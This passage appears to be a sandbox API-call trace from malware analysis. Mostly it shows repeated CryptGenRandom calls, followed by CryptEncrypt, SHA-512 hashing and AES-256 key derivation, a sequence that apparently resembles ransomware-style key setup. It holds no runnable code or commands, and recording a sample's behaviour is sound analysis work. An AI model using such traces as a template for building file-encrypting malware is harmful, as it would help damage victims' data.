[0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.749] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.750] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0168.750] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0168.751] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0168.751] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.751] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad8b8) returned 1 [0168.751] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0168.751] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) 